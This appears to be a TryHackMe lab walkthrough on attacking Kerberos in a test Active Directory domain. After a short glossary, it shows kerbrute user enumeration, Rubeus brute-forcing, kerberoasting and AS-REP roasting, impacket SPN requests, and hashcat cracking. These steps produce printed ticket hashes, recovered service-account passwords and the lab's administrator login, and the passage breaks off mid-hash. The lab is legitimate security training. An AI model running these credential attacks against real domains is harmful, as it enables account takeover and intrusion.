Kerberos is the default authentication service for Microsoft Windows domains
Ticket Granting Ticket (TGT) - A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain. Key Distribution Center (KDC) - The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service. Authentication Service (AS) - The Authentication Service issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets. Ticket Granting Service (TGS) - The Ticket Granting Service takes the TGT and returns a ticket to a machine on the domain. Service Principal Name (SPN) - A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. KDC Long Term Secret Key (KDC LT Key) - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC. Client Long Term Secret Key (Client LT Key) - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key. Service Long Term Secret Key (Service LT Key) - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC. Session Key - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket. Privilege Attribute Certificate (PAC) - The PAC holds all of the user's relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.
Ticket Granting Ticket
Service Principal Name
Privilege Attribute Certificate
AS,TGS
Brute Force user enumeration
┌──(kali㉿kali)-[~/TryHackMe/AttackingKerberos] └─$ ./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 06/25/24 - Ronnie Flathers @ropnop 2024/06/25 08:28:57 > Using KDC(s): 2024/06/25 08:28:57 > CONTROLLER.local:88 2024/06/25 08:28:57 > [+] VALID USERNAME: admin1@CONTROLLER.local 2024/06/25 08:28:57 > [+] VALID USERNAME: administrator@CONTROLLER.local 2024/06/25 08:28:57 > [+] VALID USERNAME: admin2@CONTROLLER.local 2024/06/25 08:28:59 > [+] VALID USERNAME: machine2@CONTROLLER.local 2024/06/25 08:28:59 > [+] VALID USERNAME: machine1@CONTROLLER.local 2024/06/25 08:28:59 > [+] VALID USERNAME: sqlservice@CONTROLLER.local 2024/06/25 08:28:59 > [+] VALID USERNAME: httpservice@CONTROLLER.local 2024/06/25 08:28:59 > [+] VALID USERNAME: user2@CONTROLLER.local 2024/06/25 08:28:59 > [+] VALID USERNAME: user1@CONTROLLER.local 2024/06/25 08:28:59 > [+] VALID USERNAME: user3@CONTROLLER.local 2024/06/25 08:28:59 > Done! Tested 100 usernames (10 valid) in 2.264 seconds
10
sqlservice
machine2
user3
To start this task you will need to RDP or SSH into the machine your credentials are -
Username: Administrator Password: P@$$W0rd Domain: controller.local
Using Rubeus.exe to harvesting credential Rubeus.exe harvest /interval:30
Bruteforcing using Rubeus.exe
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe brute /password:Password1 /noticket ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [-] Blocked/Disabled user => Guest [-] Blocked/Disabled user => krbtgt [+] STUPENDOUS => Machine1:Password1 [*] base64(Machine1.kirbi): doIFWjCCBVagAwIBBaEDAgEWooIEUzCCBE9hggRLMIIER6ADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyi JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPTlRST0xMRVIubG9jYWyjggQDMIID/6ADAgESoQMCAQKiggPx BIID7b9BZJgtgVT4XUHScthl9TJPst8tYJ9rF1bf54GCKR+qURci8mBdsvrFs84Yrf5hTKPxNQeeHKnA 2nFJby101mxVZ1Mx8vGf/dBXPv1Mus+RL9KY8BzjuM2pjKIgxR5K6oZxPf9xUIn+I/Nyl1yc7J04cJa+ aeoI0N7Cr2g38IZ/oic3wkEgtmkWN+1RuwOPkrcwWZZpsakJbesR+CJdPUKqmF810IgjgijN2oY/9c7R /7VhsVtVaNG3XVwVex65BHeamu4ZeW5Y2nbuEECSrZH+TfbhR4YFXtorAtFNF79ottjGwBgkjnBCjw/F Xuau8tSDSwZSTB+1aXaere9PfF44nxk0lXJv3SzZXtCEqP9gEowrS9UVRWKqim13uQ4nmI7WnD5i3pn2 iO4L1Fy0Uk0e87ErBU8SlqbpOUEir7cqU7RhnrmC/9wLxKKN9kqHB9VWP/tAbafjWlJ7Gz+Hfmlare0E NZgpXdt1ZP7kLtJjKNYpgauvOeMTeet91yol4jAkCMlQ+PwYNaeSLxTIHqCLHazKil21YN6XiAug+u2P hiUpjgqK9RJ9zcMPPyshZ7TTN+iCyvQljMNKwxomGHRLKcvTxLrPPgGUXwT3SwIZfTOlbUb/97kpVDv6 3H0Q0bY3i5+4SH1u2rrfmYSXF4hEfUG4Bh86+xKmStF/IpeIpRuAZtjQusOcu27lDViC+cqgSsZ4TzgP 48WfGSRT5GoB3vM5yYDWG+g12db7oNQYFayaONYxd/HA9fCBYg3pgP4AonJeTyODL9n/2FfqBFz6zv7i 2FrMkPzBtDC2a0AKyQvCf1OEwWbQ3dNBmSfrBDhvUVRUXnQB1BUJoXdmDn70yzOxFHYYD8KVoDpKctjp SrZCUtvcXuUU9ksbvJtQoHE4KnxZGbIzdV+15VtEOkG3dP57rcuPUsSfybI3lIp6E97801g3/nTckwWP v/+OW6ujQMmcidNYc5c8pBKZbrwm9iKaQzimsr5eh4TIHBhD/dDZi4aoaQme3v9+QnqwjjwNEYLvNUma 2Qgf/EaV0D99x4bqSXf6vmEx7Y+5uyo8ppEtaxmXmWxnxOcU8rtIkGjGcELNbzLwd0QF77kYOCiDMKbm YCxyby7J/eoEOecKWEDJow2xl119IG/bG582RhfH/eierumFpS8ZJHwczusyYuGJm9uplQY4i5hcda4b QJpFc2TaBbpVXCMvo9SseIB9cMTxQlRNuO6UQGxAq1Jgl2VJv71dTsqOZui3MUohkIuFdZ1+TK1reoDn PZ7PRyMJtxn/rOR59z7xMB2zIsWm1ctHwtQbKArUS7kvgHN0R5qoisc5FnuFY3kzf6OB8jCB76ADAgEA ooHnBIHkfYHhMIHeoIHbMIHYMIHVoCswKaADAgESoSIEIPFP7wvl6hq7/SqCDTWgd1SVNxU0hdi2ptiS WBeMMqmNoRIbEENPTlRST0xMRVIuTE9DQUyiFTAToAMCAQGhDDAKGwhNYWNoaW5lMaMHAwUAQOEAAKUR GA8yMDI0MDYyNTAxNDY0OFqmERgPMjAyNDA2MjUxMTQ2NDhapxEYDzIwMjQwNzAyMDE0NjQ4WqgSGxBD T05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLmxvY2Fs [+] Done
Administrator
CONTROLLER-1
Rubeus.exe kerberoast This will dump the Kerberos hash of any kerberoastable users
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe kerberoast ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [*] Total kerberoastable users : 2 [*] SamAccountName : SQLService [*] DistinguishedName : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local [*] ServicePrincipalName : CONTROLLER-1/SQLService.CONTROLLER.local:30111 [*] PwdLastSet : 5/25/2020 10:28:26 PM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca l:30111*$584F9157CBABEBF2944692773DAC08EC$69A709E67B9CAC6BECE238CB61B5AD8A3151F4 B56383DE96D9D1C3C2552BFB3DAE740577DEBC8134211E2C34AB101B643AD4B8DC25E635AC6F713D EC1CE2E40D5500BD7BC7425E18026266599C9E7364C784B727DBF9E62EB49ADF2636978C2DCD93E9 06B59A3F00EEF5524FFDA6FA930296D83389A5C31141554F40FC0ED89D8726C4DE1AE981A15D53B1 E5C67FF458C2CCDF8B0B7B82128DFF9A8C3F0A6332EC29A2FA1A7446D70CB99E7DAE3C7EF8622650 F0BD72421AB69894992B88B1A4DDF61B036359AF5795935BF59A9BFEF2CB9BFB1387B9BC50743CEC 23BDBBCC3B01DA91C3054EAF6AD13CB2C7510661AE18489343EB138307A8F3C0F497C0392E7E1394 7133640311150E3F77BDB4FED0356D098E826E5FC1B03DA7CBB69060657758C202F9F943424D9C2E 225537CFC1D60017B20A9A215E0C5CA0B5E01D492667618E436E7B7E6DD8A99C932B0F8991217B0E 5668310FB27A68C0F25BEE9C0F8D9C2745BADAEFF9CAFB15BBCC13FA94F32631A2DB2CA2A9550BCE A519FC91A0690CC9936A047889847D831B628743F66F184F0DDD90DF8734DC68FCEBB184FE5B0482 C55FB734820BC1CBB69032D00B13EBB8E4E991CA3AAC69B6A8D27FD3C9957F734A60327363E4E2AF 379C822D0961C1984189702BF74F7FDE9042DF6F73FBAED087D2444DE8672C900E60BBB110B40975 DFA08E2C4EF2FF49C11B315623F634A43747D653F2978B8E36FE49BCD68C88008BCAB607DE42A2E9 30B411E895C08F050111B489B4E0913692F23943F8CCCF3696C5A7F3B633F7ED85239BE27419D5F7 1CE1E480AFC30EC293313761E1C139DE3A1FAF55F44119312DC2C62EA29BB37A97DA1D4C3BA0B140 0DF6F99C7AF01A160DE98DDFF1BB10D403D983F9D92D880EB16E77AA0A537FF077BF43A2A073F4D9 AEC4074D60606430CCAA1D87EB71ACE8A69C0C9149D41E667F8E00C6C1BB201273EC485498139A66 90DD98BAEDE37A24BB5D2AC029AD12C81413D77F71B3E5C8B4EEF9462CA003D8EFA4DDEC5B354B71 3E1D8D05C49F5554AB9D050BB806108829299973B783705EDCA64C3C6D592DF73A8D40913F1B2495 4F67AA614CAE5E426F2580EEF67DA3C2F1EA5132687B871FD7AFF2ADABA15476CC4902FF171567A8 92CAC15DBAB32E0AE86E434284E4D922291278406597E82D87849B812CC3AF97297C39B742363725 45B0A79F0E71293101847739F495185D72C962422ADCCB0E8312DDA95EB3D0A8A7EC7B30B92D7EAE 568816293FA62938DFD0FF911838E217FFC4825A4C36A5BD35A87589DF8DDAE0BFCD3DDA5D0537B9 78A8466E603129C2240818CB1663A33A3F4148669DD0E724015B54A457DC58A178F66BABCAA5BDF9 BF66C73FB6B3DE9AA944B9E443DDB0D50890BF3FADC294E0E82FFE422CCA214A163472A2A55A3A8B E199F3B3EC3731E48108B3D78D8C6D2C9602A2D568043E56536F61107EC6575FF578B6CE0C9DE405 19EF4702122EAC44F1937BDBEAEF2B56A36B7DF92BE8720F213E251DB76F2AFD07BB44B2E2BFA3B9 A58674BF996ED99F3CF8D41FF3EC2E495B57F8F249F38FE3918F5319F0BC5A13F17C622E22B92C8B C3C2EBAEA7CC522BC543D319D8FE6EB413A2E50E095AA5852AD692FA93 [*] SamAccountName : HTTPService [*] DistinguishedName : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local [*] ServicePrincipalName : CONTROLLER-1/HTTPService.CONTROLLER.local:30222 [*] PwdLastSet : 5/25/2020 10:39:17 PM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo cal:30222*$C7269925ED0518CD0F25D5C774675874$5CE95C55D43CAF42F77CAAB2643210862E0A D413134E4B12009789EB24EAA8A5965891A70117569F49BDDAD02FAAF2B00725D2C1BF2FA5F421B5 E6D690B7CE825E33C2F296C84AB19488BF49856D3213E4C7A38DEB643C634DF80EC37A303CD392A6 7463AB48E77DC1A79F390C4927891CBD7BB8F070A097E761460AB013B23A9F26D9E9B912B18D1C32 9CCA6BD0D85200F2B084264F4A3BECC094BB7DCEC855B3151C22B08A8F291D7313C955D139F55E38 339E1AAC6E635AC5CDF76523C3B89A5FECDF9C7527191D4CD5E5815ABDC22AA83A709576C40AF692 9D91B3285A623A4D387B7EC4D4258912EE23D55F802C252CDCF5EE5DAE55C5C85D4769C09D415B59 84ED472DDF019DF26DE38B8C23168C8743413B77C69FA3D3C166614DACCEE5564C353643F91C7015 2F7E31DB602CFAD1A048C0DF6CB957E95F28F9400A37FEE95C8A070592CE216CD21E2C8BB13DE1BF 674BD8316E51170FAD23A934322D0BC3788E745FEE2C0A5DFABF9568A629FA0C578E3ED5193E2DDE F4F09783B25A1CBA5963A54479DE7AA788F3801C64C698278869E76ACAFD4D01498242481C303B13 E2B13FFDE3E7840C09C2BC0743469A78CA22BAD1E7549595063B56F9D1BA8102D9AC5A7ED82A47C3 6E7CD25B5135D94FD3386C630F094927621B63BF0EA0E7DF33C9FF14D39D3853F13510352577DE4D 7B573018C1A3DDDC8CC3087A8AA4C7E43286127AB21008A0DA89054D424F41F04E4FF84A4DAFE9D6 DB0EF6A46FF516B86B3B812C83EE49E73FA9FB54452FCE29C65C003A783FD82B965A6E16AA24552C A2B52A82FDCE29B98B455E87506B667A20E7408ED5728D91462DC3A2FC00AEBE958B9B955E540A38 7319AE5909E209C33D279089A6EBEC3D8A2EEED5468A75AAB3D19F4FD811D11AECE9CF0FA83EB2AC 5BC7B7376220FCE4167E31654D50CBABBC2C1799866A4FFE55EC0F1E88008B9158FF86E0BEE3C102 EC6FAFB56F0055FD2858603398A33D8D9072122A514038C1FDD1179C7C7ECDE752630F1149BDC54C EF5794270C6A88971BBAD7AC0CD509620D03F67F9D9D7D5354DA7D68EB283465CC7C6EDD8C1AA2EC 0711D2596451038D8E4C63E5365E529BD54B2F2BA2C08F5F30EF582DFC88E899F25149D17C9B45A2 E06F85EE117D1E9635B17E99829593DF3F19DA6F6B817663503EBF04529812E24F2917C5D80D4816 E3BE87EAD57602234076BF7F8EBF4F35FDD0A0DE90105BB0C1DD7D50EC311459BD086747E05E036A 52097A7D519B44877D33B17F552986BC8F014051BE85AEE9E1D019C51BE2836FB0C814230C51C23B 944EA5CC057C6B54804CE401F78E5FA0C099EAE5E3DD44E400E1E03587F85234C40E9BA74068000F BB4237128AA9BADE776CD44E2DF379159A344C3FEC6360119B7084A6BFF3C30754CC764356A2D582 1B982CEEB1C39870C6A1B0E60AC00CF6308ED9C13C7E7A7035AF55973239C3E58F00077C528A2D66 C8C9A99C77829CCE91871C3FD41B4EDF7866A4DEB56AB9221CE13193EE6C52FD27A306D671E794EF 59E3F4A2AEC31A2CB749EEE3C2B56AA86F872B079CEB86FF024A935A9F8DAF1D2117C0F8E4504621 0FD1BCB6C6B1A57434BEA3D57E44B7CE63E9398BBB3702E7D22E6DB00B9E
Cracking the hash using hashcat -m 13100 -a 0 hash.txt Pass.txt
┌──(kali㉿kali)-[~/TryHackMe/AttackingKerberos/files] └─$ hashcat -m 13100 -a 0 hash.txt Pass.txt --show $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.local:30111*$584f9157cbabebf2944692773dac08ec$69a709e67b9cac6bece238cb61b5ad8a3151f4b56383de96d9d1c3c2552bfb3dae740577debc8134211e2c34ab101b643ad4b8dc25e635ac6f713dec1ce2e40d5500bd7bc7425e18026266599c9e7364c784b727dbf9e62eb49adf2636978c2dcd93e906b59a3f00eef5524ffda6fa930296d83389a5c31141554f40fc0ed89d8726c4de1ae981a15d53b1e5c67ff458c2ccdf8b0b7b82128dff9a8c3f0a6332ec29a2fa1a7446d70cb99e7dae3c7ef8622650f0bd72421ab69894992b88b1a4ddf61b036359af5795935bf59a9bfef2cb9bfb1387b9bc50743cec23bdbbcc3b01da91c3054eaf6ad13cb2c7510661ae18489343eb138307a8f3c0f497c0392e7e13947133640311150e3f77bdb4fed0356d098e826e5fc1b03da7cbb69060657758c202f9f943424d9c2e225537cfc1d60017b20a9a215e0c5ca0b5e01d492667618e436e7b7e6dd8a99c932b0f8991217b0e5668310fb27a68c0f25bee9c0f8d9c2745badaeff9cafb15bbcc13fa94f32631a2db2ca2a9550bcea519fc91a0690cc9936a047889847d831b628743f66f184f0ddd90df8734dc68fcebb184fe5b0482c55fb734820bc1cbb69032d00b13ebb8e4e991ca3aac69b6a8d27fd3c9957f734a60327363e4e2af379c822d0961c1984189702bf74f7fde9042df6f73fbaed087d2444de8672c900e60bbb110b40975dfa08e2c4ef2ff49c11b315623f634a43747d653f2978b8e36fe49bcd68c88008bcab607de42a2e930b411e895c08f050111b489b4e0913692f23943f8cccf3696c5a7f3b633f7ed85239be27419d5f71ce1e480afc30ec293313761e1c139de3a1faf55f44119312dc2c62ea29bb37a97da1d4c3ba0b1400df6f99c7af01a160de98ddff1bb10d403d983f9d92d880eb16e77aa0a537ff077bf43a2a073f4d9aec4074d60606430ccaa1d87eb71ace8a69c0c9149d41e667f8e00c6c1bb201273ec485498139a6690dd98baede37a24bb5d2ac029ad12c81413d77f71b3e5c8b4eef9462ca003d8efa4ddec5b354b713e1d8d05c49f5554ab9d050bb806108829299973b783705edca64c3c6d592df73a8d40913f1b24954f67aa614cae5e426f2580eef67da3c2f1ea5132687b871fd7aff2adaba15476cc4902ff171567a892cac15dbab32e0ae86e434284e4d922291278406597e82d87849b812cc3af97297c39b74236372545b0a79f0e71293101847739f495185d72c962422adccb0e8312dda95eb3d0a8a7ec7b30b92d7eae568816293fa62938dfd0ff911838e217ffc4825a4c36a5bd35a87589df8ddae0bfcd3dda5d0537b978a8466e603129c2240818cb1663a33a3f4148669dd0e724015b54a457dc58a178f66babcaa5bdf9bf66c73fb6b3de9aa944b9e443ddb0d50890bf3fadc294e0e82ffe422cca214a163472a2a55a3a8be199f3b3ec3731e48108b3d78d8c6d2c9602a2d568043e56536f61107ec6575ff578b6ce0c9de40519ef4702122eac44f1937bdbeaef2b56a36b7df92be8720f213e251db76f2afd07bb44b2e2bfa3b9a58674bf996ed99f3cf8d41ff3ec2e495b57f8f249f38fe3918f5319f0bc5a13f17c622e22b92c8bc3c2ebaea7cc522bc543d319d8fe6eb413a2e50e095aa5852ad692fa93:MYPassword123# $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.local:30222*$c7269925ed0518cd0f25d5c774675874$5ce95c55d43caf42f77caab2643210862e0ad413134e4b12009789eb24eaa8a5965891a70117569f49bddad02faaf2b00725d2c1bf2fa5f421b5e6d690b7ce825e33c2f296c84ab19488bf49856d3213e4c7a38deb643c634df80ec37a303cd392a67463ab48e77dc1a79f390c4927891cbd7bb8f070a097e761460ab013b23a9f26d9e9b912b18d1c329cca6bd0d85200f2b084264f4a3becc094bb7dcec855b3151c22b08a8f291d7313c955d139f55e38339e1aac6e635ac5cdf76523c3b89a5fecdf9c7527191d4cd5e5815abdc22aa83a709576c40af6929d91b3285a623a4d387b7ec4d4258912ee23d55f802c252cdcf5ee5dae55c5c85d4769c09d415b5984ed472ddf019df26de38b8c23168c8743413b77c69fa3d3c166614daccee5564c353643f91c70152f7e31db602cfad1a048c0df6cb957e95f28f9400a37fee95c8a070592ce216cd21e2c8bb13de1bf674bd8316e51170fad23a934322d0bc3788e745fee2c0a5dfabf9568a629fa0c578e3ed5193e2ddef4f09783b25a1cba5963a54479de7aa788f3801c64c698278869e76acafd4d01498242481c303b13e2b13ffde3e7840c09c2bc0743469a78ca22bad1e7549595063b56f9d1ba8102d9ac5a7ed82a47c36e7cd25b5135d94fd3386c630f094927621b63bf0ea0e7df33c9ff14d39d3853f13510352577de4d7b573018c1a3dddc8cc3087a8aa4c7e43286127ab21008a0da89054d424f41f04e4ff84a4dafe9d6db0ef6a46ff516b86b3b812c83ee49e73fa9fb54452fce29c65c003a783fd82b965a6e16aa24552ca2b52a82fdce29b98b455e87506b667a20e7408ed5728d91462dc3a2fc00aebe958b9b955e540a387319ae5909e209c33d279089a6ebec3d8a2eeed5468a75aab3d19f4fd811d11aece9cf0fa83eb2ac5bc7b7376220fce4167e31654d50cbabbc2c1799866a4ffe55ec0f1e88008b9158ff86e0bee3c102ec6fafb56f0055fd2858603398a33d8d9072122a514038c1fdd1179c7c7ecde752630f1149bdc54cef5794270c6a88971bbad7ac0cd509620d03f67f9d9d7d5354da7d68eb283465cc7c6edd8c1aa2ec0711d2596451038d8e4c63e5365e529bd54b2f2ba2c08f5f30ef582dfc88e899f25149d17c9b45a2e06f85ee117d1e9635b17e99829593df3f19da6f6b817663503ebf04529812e24f2917c5d80d4816e3be87ead57602234076bf7f8ebf4f35fdd0a0de90105bb0c1dd7d50ec311459bd086747e05e036a52097a7d519b44877d33b17f552986bc8f014051be85aee9e1d019c51be2836fb0c814230c51c23b944ea5cc057c6b54804ce401f78e5fa0c099eae5e3dd44e400e1e03587f85234c40e9ba74068000fbb4237128aa9bade776cd44e2df379159a344c3fec6360119b7084a6bff3c30754cc764356a2d5821b982ceeb1c39870c6a1b0e60ac00cf6308ed9c13c7e7a7035af55973239c3e58f00077c528a2d66c8c9a99c77829cce91871c3fd41b4edf7866a4deb56ab9221ce13193ee6c52fd27a306d671e794ef59e3f4a2aec31a2cb749eee3c2b56aa86f872b079ceb86ff024a935a9f8daf1d2117c0f8e45046210fd1bcb6c6b1a57434bea3d57e44b7ce63e9398bbb3702e7d22e6db00b9e:Summer2020
Got credential
SQLService:MYPassword123# HTTPService:Summer2020
Using IMPACKET
┌──(kali㉿kali)-[~/TryHackMe/AttackingKerberos/files] └─$ impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.158 -request Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ----------------------------------------------- ----------- --------------------------------------------------------------- -------------------------- -------------------------- ---------- CONTROLLER-1/SQLService.CONTROLLER.local:30111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local 2020-05-26 05:28:26.922527 2020-05-26 05:46:42.467441 CONTROLLER-1/HTTPService.CONTROLLER.local:30222 HTTPService 2020-05-26 05:39:17.578393 2020-05-26 05:40:14.671872 [-] CCache file is not found. Skipping... $krb5tgs$23$*SQLService$CONTROLLER.LOCAL$controller.local/SQLService*$50433987111f65d16837015cf8a29b2e$e4325e8d41d823c4de097380967bb27233d7cfc4bf336bcd4c565802bd6d412ad5fe1bd80d44d151f9b36dfead5e4769ab882d5b465bbe872346176d52db3d197f93e4eaeda09f791f0641902c9b6998b24dcaeb35b813ca16c054dd5bf4a3575fcde0852e8405a20da23871445e3c7bde18c9f3b522a2cbc1c8228d49579206c5208a0c10a5c29a668528077f44caec50a097b0b97fdbe1d5cfa5fc751dd762ab9f6b26afbf699b8dd24ecc62699571cac204b46311f96aeb406fec90c8f039560a74827dd634a44f92436aa9cb0e99cdac206233ada1759c75d8908cae94a57783bec897be707f224daf8fadea36fa823cbc2899f116fddd00b04e852b2b4ceb6b8905f11cd61d4c90179d14b7881c8252cba143a9eac1cbfffa27abeb85d62d847da7e7a7fb8c0c3c4d148866ec6e1b2440f4a93ad183c710990ad82236fbcdbf80cdf611b146034d475f06343dab3de9f3162089095b125bb2171b0a6bccf5abb979b9a532b1bcf93780ad55e85800740e6c2ad66ee8601e91a92c4f753c5edbd79aea3b64f017ac857b9645117dc1825bd384c98e00643826ab6a69c629463bec98b25eb9fb4d22203bf6dfd11668bd249e502213bfc5b52d2ca03508eaff0fbc2e1e46c92049e196cdc254d309c2c58942df804de2e7617cf074453bae6d105ae32ffec486599e24a4f8c6dfa7e3c6bf8ff3ad47ce922d6338711a0a984f1abbb874de29fe130532eefc9e8e85be25c6dafd4ccbb9836b4b24b78a1a3060904001dc0dea34f4d9c129b0b6b0c4a6fc90a396932ca4f312c1519ba7c75bc511fd236644acd356c3a8ed179c46e19654d039ad8707ff1c4e02ba3575617143c945704ab75d2579c046debe1bc3c8027b99be13436bf74feb04fbd72d36e1e35e21c2170bcd0498f44a87561ab600ef5605a87e78166badaf0631c23a1fc4a2b6c9cf4e94b65a9ada5b07ff0c8c77089dc634021a532e01082c42a97eddfcd3ee16f6b955c72dda495b7a6fd5b2f1e94635f3887fef5b11b9378c3ac5b32815aedad9fb8ac9a0f7ad4f17af88810f240b89cb5b72bdb3b91da2b3ccc7c35f4f88556051136487e60046f83f75537bd17a529f35d4f0bc90a00039a9ba192e5d903898719568194752db312ac3031c57ab4ad758c7410861a6833c986f2a99215856a262092e4be822f6f1cd28e760da8e10c775af0afaeaab03ab927dbcbeeaffa8ea5c961c3e6356c1ef644737a7fc17b9b95652057bdfa8c85b4fd333ae62d8be794431a8e7312da102ee02a4e25e94d131271a210408a6088a37095169c573733aef2d52e27c2d988aa9d51cbe9cbb5e7cd3c372f52500f2d225d993ec3f54cb3779b8d7d35ee653f2b4e373c433 $krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$controller.local/HTTPService*$59e8223076a1652ed7c91b18889ae237$f1394dc88e892adc3a179c884a127a9bb8d36c1f73c76197139987fb5e05a1f483628276180514426cec8229b916353fb8e1c2be51078570e9992e9bf7c6dec081a51ced16a7fc54f8f7e5a882dde7ec85bea1a70c9cc9a28d7503225727e521409b314542764e2aa93a2bf3176ec8f1fde0afa6778e20550fe2c77faa20a56669b19ddee573ee70b0d98580df5fae4f5d6c088e18c71c5f45162089169a5c597ae0c85ae235db33638ce5bf46b1b5c6a533888d7f307f3bd359c83ae7552752142a3d2d4debab1a75240f0ed08f2d4897ec91ec84df1c6d4933593e805d8f693f6c4b880eb5cebe8a8d1c31685a6a6ed73e0380dff6b8797e53d09a8d8e9aefcfc859c15f630d649d9c83c95ba3b46e5c0b5b337b380023d54451b4ca612c74553ff9e6d3932ab07bd66ff765ae1c4069914c55ce4b8bd68b92453616d502140050b70feaffeee8dfe719f65fa9ec0f01ac3c62f697efc51567f31cddb0f7cc05e4f15a13bdb6cb438a8bbbd19f2074033bcda201fbe08c29f145674f5b3bc1140c87929894cbef6d68367b8861545524d2b7dd56dc31df002ca05043b153fd4c719900dee5e8ca2d1d8080687ade6c3851be91236160013355baeeee38295b7cd8c844e736358b05f90e6f11edf0b44bdefd1e753300fd0a40daeefa501fdaf4a7b6a7a653f9c9fa56efa15a5620bf8311d9ec86989c18bb7db0af3bba5150f0a6709b58d44da01624719fa27a6170213426ee62050be228bceedad5681c81364ded9d554f01e24577366ce98b79f7019084dad5f1852cc05fa0d7e01f42605ee2740ec6a3113e8cf6d1d9d3f3b79058141033ac688a2c0b94cfb607d9eab061039335c471232fbb043a05bd49c9bdecbe1dff3e307d9c66d90679245db8bd33038d1b24dd5de3bb5726050ebaa964cf6ab9ccde64ef112297d2d7fc44b71085a7e11f02c54ce78ba050ba24ecff8298748b22cef49af4ac0538a8cd244b7dfd39b64b00a7abc2e269b2c6e24bcc9c6cb844864208ae3f7be3ba13b203c0d3cf0291f0d9bd352fa2af46bdbd74ba6052538060c74d605076c56dcb18538e3fba4503295e5751305a79e32e768ee1858c9bacd779babfd9a1836ed979f22c97c137157805186408bbf355ebd1e2a42d63dc14a76b4bf6be6bc1630d7783aac8ed47fe6672fd5b52a54612001512d3b1d262731103d78402495e69dbdbc0b460ffa2e07aea37f38c9f92691ab8479fb904dfe651592be173f41a039fbaf309b492db8a55df800715990aeb202325648346b9757707b67d7c6772addf92f87095a4f7f288de171cdb056d359aa1f0d9c56125d081b3e7de89d1c4dfc12e3e5dd3d0323801a57baff0b6bf0d5f2fa5c54b58
Summer2020
MYPassword123#
Dumping hash using Rubeus.exe asreproast
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe asreproast ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: AS-REP roasting [*] Target Domain : CONTROLLER.local [*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users [*] SamAccountName : Admin2 [*] DistinguishedName : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local [*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::c028:6341:3378:2d5a%5) [*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2' [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$Admin2@CONTROLLER.local:22C8D3204932277C02C00688CFA7F102$40581617AF62 97022114344C38B90ED059E93B027B74F1CB2BD42E2D8CD9C252FEF6F10F35505BC8F168360D7060 E4CA5645FF35C716C662093790A70254423FAFA33C8044143FD780CE8EABF4F0735F794F65A9F33A 7428B8F2B17B59774CA6B31AD0F30F100D8CC7121002FDAE867CDA41B0511B839FE1FEE6AF85B9D4 C3CDF8083FFDB7BB8F85AE59CDDE97CE47E529D1CE26512ACCA4A7732167D32B5D5D5D8B5927BD3F 75DC8A6EC0CE16A562FDE7CEF62CC35345020FDB4FE73ED275D97AC1F15DC4F433857C40863E8652 C087EB81ED6F06EE74EC6B8600CE8275AB7557E425EFC790B36FE3ADA76D58CF7A67D5F25470 [*] SamAccountName : User3 [*] DistinguishedName : CN=User-3,CN=Users,DC=CONTROLLER,DC=local [*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::c028:6341:3378:2d5a%5) [*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\User3' [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$User3@CONTROLLER.local:487FB02EEC5B3276BBB1B68C2FFF00F9$B7D0139CA807D 